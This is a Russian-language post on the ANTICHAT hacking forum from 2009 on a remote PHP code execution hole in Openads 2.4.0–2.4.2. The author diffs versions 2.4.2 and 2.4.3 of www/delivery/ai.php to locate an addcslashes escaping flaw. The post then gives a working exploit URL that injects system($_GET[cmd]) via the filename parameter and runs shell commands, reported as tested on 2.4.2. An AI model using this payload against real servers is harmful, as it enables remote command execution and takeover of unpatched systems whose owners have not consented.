ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Openads 2.4.0<=x<=2.4.2 выполнение php кода
  #1  
Старый 23.05.2009, 18:15
(Dm)
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
С нами: 9521666

Репутация: 1695
По умолчанию Openads 2.4.0<=x<=2.4.2 выполнение php кода

Существует уязвимость:
Openads 2.4.0 <= x <= 2.4.2
Vulnerability: Remote PHP code injection and execution

Cплойта не нашел, собственно как и описание уязвимости.
Скачал Openads 2.4.2 и Openads 2.4.3

PHP код:
diff -r openads-2.4.2/www/delivery/ai.php openads-2.4.3/www/delivery/ai.php
28c28
< $Id: ai.php 12787 2007-11-26 10:00:33Z andrzej.swedrzynski@openads.org $
---
> 
$Id: ai.php 14232 2008-01-09 17:30:42Z andrzej.swedrzynski@openads.org $
1094,1097c1094,1100
< } elseif (preg_match('/^.+:.+$/', $what)) {
< list(
$whatName, $whatValue) = explode(':', $what);
< if (
$whatName == 'zone') {
< 
$whatName = 'zoneid';
---
> } elseif (
preg_match('/^(.+):(.+)$/', $what, $matches)) {
> switch (
$matches[1]) {
> case 
'zoneid':
> case 
'zone':        $zoneid     = $matches[2]; break;
> case 
'bannerid':    $bannerid   = $matches[2]; break;
> case 
'campaignid':  $campaignid = $matches[2]; break;
> case 
'clientid':    $clientid   = $matches[2]; break;
1099,1100d1101
< global $$whatName;
< $
$whatName = $whatValue;
1329c1330
< $cache_literal .= "$"."cache_name       = '".addcslashes($name, "'")."';\n";  <- тут уязвимость
---
> 
$cache_literal .= "$"."cache_name       = '".addcslashes($name, "\\'")."';\n"; 
После изучения функций этого скрипта написал сплоит:
http://localhost/www/delivery/ai.php?filename=antichat.jpg';system($_GET[cmd]);/*&contenttype=antichat&cmd=ls -la

проверял на Openads 2.4.2
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.